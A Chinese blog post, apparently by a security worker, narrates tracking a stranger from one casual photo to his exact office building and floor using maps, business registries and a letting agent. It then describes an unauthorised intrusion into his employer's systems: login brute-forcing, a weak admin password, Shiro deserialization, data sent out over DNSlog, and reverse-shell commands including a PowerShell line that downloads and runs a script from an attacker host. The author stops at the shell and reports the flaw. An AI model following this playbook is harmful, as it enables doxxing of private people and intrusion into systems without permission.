一张随拍引起的安全思考

起因

国庆的某一天，在一个我的小伙伴把我拉进去的小型的QQ群里，一个我不认识的兄弟发了一张图片，然后吐槽自己国庆正在加班。正好国庆值班的我闲着也是闲着，于是给自己找点事情做，就和这位兄弟简单聊了一下，不禁感到“同是天涯加班人，相聊何必曾相识”。然后就想试试看能不能把他的信息找出来，接下来就开始了一段社工加渗透的旅程。

经过

首先，就只有这一张图，清晰度也是被QQ压缩过的。但是放大之后勉强可以看清一些东西，比如：

放大之后就这样，大家是不是完全认不出来写的是啥啊？哈哈哈，那是因为我打了码。

未打码之前，其实我也只能看清后面四个字，最后两个是双语，第二三个字，也能勉强认出来，但是就不透露了。第一个字是完全认不出来。。但是还有一个重点，即使认不出字，大家也肯定能发现这五个字颜色不一样吧，也就是彩色的牌子，再结合之前最后两个字双语，再结合一点生活经验。好，想必大家应该都知道了。没错，这就是一个xxx双语幼儿园！

好了，直接百度，知道两个字了，第一个字知不知道其实影响不大。

好，因为我目前是在深圳，因此百度直接弹出了这个界面。这给了我两个关键信息。1：如果幼儿园前面那两个字我没认错的话，首先排除深圳。2，既然提到地点了，我可以缩小范围，加上他所在的地区啊。于是赶紧登了QQ，然后点开信息查询。

哈哈哈，北京顺义，我正以为马上就能找到正确的答案了。结果给我当头一棒，北京也没有，我都怀疑起我语文是不是体育老师教的了，难道我那两个字认错了不成？

然后我静下来一想，他是我朋友的大学同学，都是在武汉上的大学，所以按常理，他很大概率是在武汉上班。于是，抱着试试的想法，在前面加了武汉两个字。

好家伙，你一个在武汉上学工作的兄弟，个人信息里却写个北京。不由得感叹，现在的年轻人啊，一个个轻佻浮躁，连地址都不好好写，害得我一顿找。但是转念一想，万一人家真的是住在北京，有户口的那种，顿时心里一酸，流下羡慕的泪水。。

现在已经找到了照片中的这个幼儿园，那么找到这个拍摄者的大概位置应该并不难。首先先点开地图，看一下周围环境。

发现扇形的公园和幼儿园的位置十分对应，然后可以看到附近的楼房位置也和地图上的几乎一样。这下更加确定了目标的地址，确实就是地图上搜索到的位置。接下里就可以放心的打开实景地图进行搜寻了。首先我们点击了幼儿园的位置，进入到了实景模式。

通过地图很容易知道，接下来该往南走了，中间的路途就不放了，直接到我们的目的地。

没错，已经可以确定就是这栋写字楼了。而这正好也是类似与软件园那样的办公场所，应该很多公司共用一栋楼，分别租的不同的楼层用于办公。而且，从拍摄者的角度初步判断，应该属于8层以上的高层。并且，通过一些照片的细节判断，应该是在右边第一列。

目前从这张照片所能获取的信息就这么多了。然后，知道了这栋楼的栋数为2A栋，知道了这个软件园的名字。接下来就是到天眼查上逛一逛了。输入了具体的地址后，蹦出来了一堆公司，简单看了下，2A栋8层以上的公司也不算少。

这里又引入了新的问题，那就是这个位置是几号或者几室，这个问题由我们目前所掌握的信息是无法解决的。就在我一筹莫展的时候，点击了下这个地址，然后突然跳到了以下界面，卧槽，这不正是山重水复疑无路，得来全不费工夫吗？？？

于是随便点击进去了一个， 找到了中介的联系方式，加微信!然后直奔主题。

OK，这下就把范围缩的很小很小了。然后看看有哪些公司吧，最后整理了下发现有两家公司可能性最大，分别是12层3号和15层3号。然后一家是房屋建筑业，还有一家是软件和信息技术服务业。。然后我问了下我的同学，得知他大学专业为软件工程。。。哦豁，不用想了吧。已经百分之99确定了那个兄弟的公司了。

然后点击进去，发现公司介绍里面有个网站，简单看了下，找到了一个登录界面，第一时间想到了弱口令，爆破，注入等基本操作。

话不多说，打开BP直接开干。因为有验证码的存在，直接通过intruder模块来爆破是不行的。这里可以使用一款专门处理这种较简单验证码的工具——PKAV HTTP Fuzzer。用法其实和BP差不多，首先是抓取登录时候的数据包，不过这款软件没有这个功能，还是用BP抓包，之后复制到这里来。跟BP的区别是这里有个添加验证码标记。之后将验证码图片的网络地址复制过来进行识别即可绕过验证码进行爆破了。（图片仅供参考，非实际截图）

但是，数百秒过去了，却一点结果都没有，应该是密码复杂度挺高，感觉可以放弃这条路了。然后手动测试了下，看看有没有逻辑漏洞可以直接以管理员身份登录，多次尝试无果，就只能换其他的路走了。

扫了下目录，没有什么有价值的发现。然后扫了下端口，发现22端口开着，那么明知山没虎，偏向虎山行，果不其然，hydra爆破了下没有任何收获，这条路也堵住了。

然后看到了一个奇怪的端口，8099。。好奇心驱使着我，直接web访问一下看看，是一个登录系统，看上去像是他们员工的登录系统，感觉有点希望。

然后随便抓了下包看看，这下密码是加了密的，老套路走不通了。于是只能试试弱口令了，账号admin，密码111111，123456等等，然后admin123，，登陆成功。。？？？？不是吧阿sir，就进去了？？但是还没来得及高兴就给当头一棒。。登陆后发现后台功能十分简单，没有上传点，没有SQL注入，XSS都没有，，，没办法直接获取权限，这可真是日了X了。。。然后无奈只能看看BURP，有没有什么发现，好家伙，不看不知道，一看吓一跳。。

这不是shiro反序列化的rememberme吗。。。然后思考了下，先对登录接口进行shiro反序列化测试，先ping一下dnslog平台看看dnslog是否能接收到数据。

然后发现dnslog平台接收到了数据，开始反弹shell，我们先监听一个端口。

nc -lvvp 1234

接下来制作反弹shell的代码。

对bash -i >& /dev/tcp/IP/1234 0>&1直接进行反序列化绕过base64编码。

然后我们使用shiro的exp来进行反弹shell。

然后exp执行完了还是没有收到反弹的shell,能ping通但是反弹不回来shell这个时候我们首先想到两种想法：

1、 反弹的命令不对，有可能是服务器是windows系统，不支持bash反弹；

2、 协议不对，目标服务器限制了出网的协议不能是tcp，这个时候我们可以尝试使用icmp协议反弹shell。

我们先判断一下其他命令能不能执行，通过dnslog外带出来，假如目标服务器是linux系统，我们使用反引号加上whoami然后再拼接到dnslog平台可以将当前用户名带出来，如果带不出来，说明不能执行就很有可能是windows系统。

结果DNSLOG没有带出来数据，然后我们尝试使用ceye平台。

然后ceye收到了请求，外带的数据是root。

这个时候你是不是觉得目标服务器就是linux了，其实不然，因为我们使用反引号时在我们本机执行命令的时候就已经将whoami替换成了root(其实我一开始也觉得是linux系统了，然后我不甘心又执行了一个cat /etc/hostname发现主机名和我的主机名相同，我才感觉不对劲，后来想起来反引号需要转义一下)数据在发送之前就已经被执行了。

然后我们将反引号转义之后再发送，ceye平台没有收到解析记录，说明服务器没有执行我们的whoami命令。之后我们使用powershell反弹shell，首先在本地下载一个脚本，然后在脚本所在的目录下起一个http服务，然后监听2222端口。准备就绪后，开始反弹shell。

`python3 shiro_rce1.py https://xxx/xxx/xx/login "powershell IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress xx.xx.xx.xx -port 2222"`

成功反弹shell。

结果

拿到shell了，其实我是想继续深入渗透下，看能不能找到一些那位兄弟的资料。这样可能才有点戏剧性的结果。。但是冷静了下，仔细思考了一会，，这可是未授权渗透啊，再往下继续的话，被发现了后果很严重。。于是赶紧止步于此，然后提交个CNVD事件型的漏洞。之后QQ联系下那位兄弟，跟他简单说下这个情况，让他跟他们领导或者其他懂安全的人反馈下，顺便给他普及了下安全知识。。

你以为这就结束了?不！我反手就是一波推销，建议购买我们360公司的安全设备和安全服务！！！

结语

整个流程还是得从一张普通的随拍说起，无意一张照片，却可以让一个完全陌生的人找到他所在的公司，严重点的话通过漏洞getshell之后甚至可以获取更重要的资料，对公司造成损失。因此，大家要注意在日常生活中的一些不经意的活动中都可能会泄露一些敏感信息，所以我们要培养一定的安全意识。早在1964年，著名的照片泄密案，是《中国画报》封面刊出的一张照片。在这张照片中，铁人王进喜穿着棉袄，下着大雪。，眺望远方。。而日本的情报专家根据这张简单的照片，解开了中国最大的石油基地的秘密。

之后拿到网站之后的操作其实就很基础了。弱口令是一个利用简单危害却很大的漏洞，但是如今仍然十分普遍，这就是安全意识不足导致的。在shiro反序列化的过程中虽然遇到了点小问题，但是也还好，没有遇到太多的挫折就拿到shell了，可能还有其他的漏洞我还没有注意到。当然，我也不能再继续挖掘了，不然再看到这篇文章的时候，可能我就进去了。。

——END——